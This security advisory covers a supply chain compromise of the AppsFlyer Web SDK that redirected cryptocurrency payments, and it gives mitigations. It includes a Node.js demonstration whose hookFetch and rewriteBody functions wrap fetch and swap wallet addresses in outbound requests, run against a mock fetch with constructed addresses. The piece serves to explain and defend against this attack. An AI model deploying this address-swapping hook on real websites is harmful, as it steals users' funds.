AppsFlyer SDK - Supply Chain Attack Exposed Cryptocurrency Users
In short: attackers tampered with a marketing analytics component embedded in many websites so that it quietly swapped users' cryptocurrency destination addresses for their own.
A supply chain attack compromised the AppsFlyer Web SDK, diverting cryptocurrency payments from users of thousands of websites that embed it. Users who transacted while the tampered code was live may have lost funds, and organizations that embed the SDK need to act quickly to secure their pages.
What Happened
On March 10, 2026, a supply chain attack compromised the AppsFlyer Web SDK, a marketing analytics library widely embedded in websites. Malicious code inserted into the SDK intercepted cryptocurrency wallet addresses that users entered on affected sites and replaced them with addresses controlled by the attackers, so that funds went to the attackers rather than the intended recipients. The attack was discovered by Profero researchers, who noted that over 15,000 businesses rely on the AppsFlyer SDK.
The malicious code was served from the official AppsFlyer domain, so neither site operators nor users had an obvious signal that anything had changed. It preserved the SDK's normal functionality while monitoring network requests for wallet addresses, targeting Bitcoin, Ethereum, Solana, Ripple, and TRON.
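To make the mechanism concrete, here is an added illustration written for this page; it is not the AppsFlyer SDK's code and not the actual malicious payload. A small Node.js script wraps a fetch-like function, scans outbound JSON bodies for the address shapes of the five chains named above, and swaps them for attacker-controlled ones, exactly the gap between "what the page sent" and "what went over the wire" that makes this class of attack invisible to the page. A mock fetch stands in for the browser's, every address is constructed rather than real, and the function names and the hypothetical API endpoint are assumptions. The address patterns are approximations adequate for a demonstration, not validators; the `destinationMatches` check at the end is the consistency test a practitioner would want, with the caveat that it is only trustworthy when it runs outside the possibly compromised page.

```javascript
'use strict';
// Added example: illustrates the attack class described in the article (a script on the
// page wrapping fetch() and swapping wallet addresses in outbound requests). This is NOT
// the AppsFlyer SDK or the real payload; all addresses below are constructed, not real wallets.

// Approximate per-chain address shapes. The base58 alphabet omits 0, O, I and l.
// Alternatives are tried in order, so prefixed formats win over the generic Solana shape.
const WALLET_RE = new RegExp(
  '\\b(?:' +
    '(?<eth>0x[0-9a-fA-F]{40})|' +
    '(?<btc>bc1[02-9ac-hj-np-z]{25,59}|[13][1-9A-HJ-NP-Za-km-z]{25,34})|' +
    '(?<xrp>r[1-9A-HJ-NP-Za-km-z]{24,34})|' +
    '(?<trx>T[1-9A-HJ-NP-Za-km-z]{33})|' +
    '(?<sol>[1-9A-HJ-NP-Za-km-z]{32,44})' +
  ')\\b',
  'g',
);

// Which named group matched: the first one that is not undefined.
function chainOf(groups) {
  return Object.keys(groups).find((k) => groups[k] !== undefined);
}

// Every address-like token in a string, tagged with its (probable) chain.
function findWalletAddresses(text) {
  return Array.from(text.matchAll(WALLET_RE), (m) => ({ chain: chainOf(m.groups), address: m[0] }));
}

// Attacker side: replace each recognised address with the attacker's address for that chain.
function rewriteBody(body, attackerAddresses) {
  return body.replace(WALLET_RE, (match, ...rest) => {
    const chain = chainOf(rest[rest.length - 1]); // last replace() callback argument is the groups object
    return attackerAddresses[chain] || match;
  });
}

// Attacker side: the wrapper installed over the page's fetch. Page code still calls
// fetch(url, {body}) with the user's address; only the bytes on the wire change.
function hookFetch(realFetch, attackerAddresses) {
  return function hookedFetch(url, init = {}) {
    if (typeof init.body === 'string' && findWalletAddresses(init.body).length > 0) {
      init = { ...init, body: rewriteBody(init.body, attackerAddresses) };
    }
    return realFetch(url, init);
  };
}

// Defender side: does the outbound body carry exactly the destination the user confirmed?
// Only trustworthy when run outside the possibly compromised page (e.g. server-side against
// an address the user confirmed through a separate channel), because injected script can
// also tamper with checks that run in the same page context.
function destinationMatches(body, confirmedAddress) {
  const addresses = findWalletAddresses(body).map((a) => a.address);
  return addresses.length > 0 && addresses.every((a) => a === confirmedAddress);
}

// Constructed sample data (not real wallets, not a real endpoint).
const USER_ETH = '0x' + '1'.repeat(40);
const ATTACKER = { eth: '0x' + '2'.repeat(40), btc: '1' + 'B'.repeat(33) };
const PAGE_BODY = JSON.stringify({ asset: 'ETH', amount: '0.5', to: USER_ETH });

// Send the withdrawal request through a mock fetch with the hook installed and return
// what the page believed it sent next to what actually went out.
function demo() {
  const wire = [];
  const mockFetch = (url, init) => { wire.push(init.body); return Promise.resolve({ ok: true }); };
  const fetchAfterInjection = hookFetch(mockFetch, ATTACKER);
  fetchAfterInjection('https://api.example.test/withdraw', { method: 'POST', body: PAGE_BODY });
  return { sentByPage: PAGE_BODY, receivedOnWire: wire[0] };
}

if (typeof require !== 'undefined' && require.main === module) {
  const r = demo();
  console.log('page sent   :', r.sentByPage);
  console.log('wire carried:', r.receivedOnWire);
  console.log('destination intact?', destinationMatches(r.receivedOnWire, USER_ETH));
}
```

Run it with `node` and the two printed bodies differ only in the destination field, which is the whole point: nothing the page's own code sees has changed, so client-side logging of "what we sent" would look clean. A server that receives the request can still catch the swap if it has an independently confirmed address to compare against.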
Who's Affected
Any website that embeds the AppsFlyer Web SDK was affected, and users who entered a cryptocurrency wallet address on such a site while the tampered code was being served were exposed to having their funds redirected. Both the businesses that embed the SDK and their end users are therefore at risk, and organizations that depend on AppsFlyer for marketing analytics need to act quickly to limit losses.
AppsFlyer confirmed that the issue stemmed from a domain registrar incident, which let the attackers serve modified SDK code from AppsFlyer's own domain. The mobile SDK was not affected, but the implications for the web version are significant.
What Data Was Exposed
Strictly, this incident was tampering rather than a leak: the data at stake was the destination wallet address in each transaction a user submitted through an affected site. By swapping legitimate addresses for their own, the attackers redirected funds from unsuspecting users. The result is direct financial loss for the user and damaged trust in the applications that embed the compromised SDK.
Organizations using the AppsFlyer Web SDK should be particularly vigilant. Cryptocurrency transfers cannot be reversed, so funds sent while the tampered code was live are generally not recoverable, and users' transactions remain at risk until every affected site is confirmed to be loading known-good code.
What You Should Do
Organizations that embed the AppsFlyer Web SDK should take immediate action. First, review telemetry and web server logs for activity consistent with a compromise, and establish what version and content of the SDK your pages have actually been loading. Consider reverting to a known-good version of the SDK until further assessments can be made, but note that because the tampered file was served from the SDK's own domain, pinning a version in the script URL does not by itself guarantee known-good code; verify the bytes you load (for example with Subresource Integrity) or host a reviewed copy yourself.
Additionally, businesses should tell their users about the risk and encourage them to check every transaction they made during the affected period. Controls that confirm the destination of a transaction, such as showing the address on a hardware wallet's display or confirming it through a second channel, address this class of attack; multi-factor authentication alone does not, because the user knowingly approves a transaction whose destination has already been swapped. This incident is a reminder that third-party code loaded into your pages runs with your site's full privileges, and that supply chain security requires continuous vigilance.
SC Media